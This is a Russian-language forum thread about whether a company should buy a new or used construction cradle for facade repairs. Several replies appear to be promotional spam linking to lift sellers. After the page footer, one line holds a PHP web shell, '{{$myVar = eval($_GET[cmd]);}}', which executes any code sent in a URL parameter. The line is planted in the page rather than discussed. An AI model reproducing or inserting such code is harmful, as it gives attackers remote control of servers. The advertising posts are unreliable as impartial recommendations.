+ Ответить в теме
Показано с 1 по 9 из 9

Тема: Строительная люлька


  1. #1
    Мимо проходил Victan is on a distinguished road Аватар для Victan
    Регистрация
    12.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    39

    Строительная люлька

    У нас на производстве в этом году планируется капитальный ремонт, в том числе будет производиться и ремонт фасадов зданий. Для этого понадобится строительная люлька-подъемник. Как считаете, для этих целей нужно покупать только новую или можно купить подержанную?

  2. #2
    Мимо проходил Arsenal is on a distinguished road Аватар для Arsenal
    Регистрация
    12.02.2019
    Откуда
    ......
    Машина
    ...
    Сообщений
    37
    Я бы поостерегся покупать подержанное оборудование для работы на высоте. Все-таки, в этом есть определенный риск. Думаю, не стоит экономить на таких вещах, тем более, как я понимаю, покупка оборудования все равно будет производиться за счет средств предприятия. Прицениться к люлькам-подъемникам можно вот здесь http://stroitelnaya-lyulka.ru/

  3. #3
    Мимо проходил Kommunar is on a distinguished road Аватар для Kommunar
    Регистрация
    26.01.2019
    Откуда
    .....
    Машина
    .....
    Сообщений
    66
    А кто у вас будет производить ремонт? Не проще ли нанять для этих целей серьезную строительную фирму? У них и оборудование в наличии будет и не нужно будет вам озадачиваться покупкой строительной люльки.

  4. #4
    Мимо проходил nekrolog is on a distinguished road Аватар для nekrolog
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    54
    Автор, главное, чтобы люлька была в идеальном состоянии. А так, в принципе, подержанная будет стоить намного меньше чем новая, так что такая покупка будет экономически выгодна.

  5. #5
    Мимо проходил fionis is on a distinguished road Аватар для fionis
    Регистрация
    30.11.2018
    Машина
    Гольф
    Сообщений
    49
    Я думаю, что лучше купить новую технику, во-первых, она вас точно не подведет, во-вторых, у нее будет гарантийное обслуживание, в-третьих, сами сможете потом ее сдавать в аренду. Ну по крайней мере я планирую делать именно так. Автор, вы правда не указали регион, в котором ищите для себя вышку. Я и сам был в поисках компании со строительной техникой, нашел одну, которая работает в шести регионах России http://podjemniki.ru/ Возможно кому-нибудь пригодится еще. Victan, если вам еще актуален этот вопрос, то посмотрите ссылку, я думаю, что вы найдете у них нужный вам подъемник

  6. #6
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    Замена строительных лесов на строительную люльку было одним из лучших наших решений. Заказ мы делали у этой компании https://advanta-nn.ru/stroitelnoe-ob...roitelnye.html, которая непосредственно находится в Нижнем Новгороде. Платформа достаточно большого размера и спокойно вмещает себя несколько рабочих со всеми необходимым оборудованием. Также есть возможность подключение электрических инструментов для определенных видов работ. Такие люльки значительно безопаснее стандартных строительных лесов, они оснащены страховочными тросами и защитным ограждением.

  7. #7
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Наша небольшая строительная компания в Новосибирске пока делает первые шаги и не все еще оборудование куплено. Вот думаем стоит ли покупать фасадный подъемник для выполнения одно работы предстоящей или арендовать его лучше? Грузоподъемность нужна 630 кг не менее.

  8. #8
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Кстати, зацените вот на сайте этой компании https://podemnik-nsk.ru/teleskopiche.../odnomachtovye одномачтовые какие есть подъёмники. Ну, это телескопический тип подъёмника, который как по мне очень даже достойно показывает себя на производстве, ну или где там в вашем случае - на строительстве например. Он и удобный, и практичный реально) Ну а в "Подъёмник-НСК" еще и по приятной цене приобрести его можно)

  9. #9
    Новичок Drughok is on a distinguished road Аватар для Drughok
    Регистрация
    21.10.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    104
    Цитата Сообщение от Victan Посмотреть сообщение
    У нас на производстве в этом году планируется капитальный ремонт, в том числе будет производиться и ремонт фасадов зданий. Для этого понадобится строительная люлька-подъемник. Как считаете, для этих целей нужно покупать только новую или можно купить подержанную?
    А зачем покупать и тратить на это не малые деньги если можно просто взять в аренду, наша фирма по надобности берет их вот в этой компании https://vira21.ru/arenda-tekhniki-i-...telnoj-lyulki/. Так что и ты подумай, нужно ли все таки покупать.

+ Ответить в теме

Похожие темы

  1. Строительная люлька
    от Draiter в разделе Бизнес
    Ответов: 10
    Последнее сообщение: 16.04.2021, 19:37
  2. Строительная техника
    от KOT в разделе Курилка
    Ответов: 7
    Последнее сообщение: 05.07.2020, 08:39
  3. строительная техника
    от lissa89 в разделе Недвижимость
    Ответов: 8
    Последнее сообщение: 29.04.2020, 10:49

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}